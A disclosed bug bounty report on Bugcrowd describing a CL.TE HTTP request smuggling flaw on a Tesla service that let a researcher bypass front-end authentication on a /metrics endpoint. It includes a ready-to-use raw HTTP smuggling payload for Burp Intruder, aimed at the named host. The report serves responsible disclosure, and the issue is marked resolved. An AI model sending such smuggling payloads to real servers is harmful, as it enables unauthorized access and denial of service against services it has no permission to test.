Authentication Bypass through HTTP Request Smuggling on https://apm.ap.tesla.services

Disclosed by
riramar's avatar
riramar
  • Engagement Tesla
  • Disclosed date about 4 years ago
  • Points 40
  • Priority P3 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by riramar

The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.

Report details

  • Submitted

  • Target Location

    *.tesla.services

  • Target category

    Web App

  • VRT

    Broken Authentication and Session Management > Authentication Bypass

  • Priority

    P3
  • Bug URL
    https://apm.ap.tesla.services/metrics
  • Description

    The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.
    As PoC I'm using the URL https://apm.ap.tesla.services/metrics which returns 401 (Unauthorized) when you access it.

    hrs_0.png

    By performing the Burp Intruder attack below with the CLTE payload an attacker can bypass the front-end and access https://apm.ap.tesla.services/metrics.

    hrs_1.png

    hrs_2.png

    hrs_3.png

    Notice the path /metrics is just an example. Any protected resource using the same security controls can be exploited in the same way.
    Please check the video attached (apm.ap.tesla.services-poc.mp4) for reference to reproduce and I'm providing the Burp Intruder payload below.

  • HTTP request 
    POST /?cb=906971031432954 HTTP/1.1
Transfer-Encoding : chunked
Host: apm.ap.tesla.services
Connection: keep-alive
ID: §0§
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

1
Z
0

GET /metrics HTTP/1.1
Host: apm.ap.tesla.services

0
Activity
  1. Nick’s avatar
    Nick Customer published the disclosure report

    ()

  2. riramar’s avatar
    riramar requested disclosure

    ()

  3. Jon’s avatar
    Jon Customer rewarded riramar

    ()

    • Hi Ricardo, Thanks for your patience with this submission. We believe we've identified the cause of the issue on the remaining domain and we will be addressing it in the near future. I'm going to resolve the bug now so we can get you a bounty. We've decided to award based on the nature of the accessible information, and the possibility of causing a denial of service against the service. Note that DoS attacks are typically out of scope, but in this case the ease of the attack was taken into consideration. We very much appreciate the submission and hope to see more from you in the future. Happy hacking!
  4. Jon’s avatar
    Jon Customer changed the state to Resolved

    ()

  5. Jon’s avatar
    Jon Customer changed the severity to P3

    ()

  6. Jon’s avatar
    Jon Customer sent a message

    ()

  7. riramar’s avatar
    riramar sent a message

    ()

  8. Jon’s avatar
    Jon Customer sent a message

    ()

  9. riramar’s avatar
    riramar sent a message

    ()

  10. Jon’s avatar
    Jon Customer sent a message

    ()

  11. riramar’s avatar
    riramar sent a message

    ()

  12. Jon’s avatar
    Jon Customer changed the severity to P4

    ()

  13. Jon’s avatar
    Jon Customer sent a message

    ()

  14. riramar’s avatar
    riramar sent a message

    ()

  15. Jon’s avatar
    Jon Customer changed the state to Triaged

    ()

  16. Jon’s avatar
    Jon Customer changed the state to Unresolved

    ()

  17. Jon’s avatar
    Jon Customer rewarded riramar 40 points

    ()

  18. Jon’s avatar
    Jon Customer sent a message

    ()

  19. riramar’s avatar
    riramar created the submission

    ()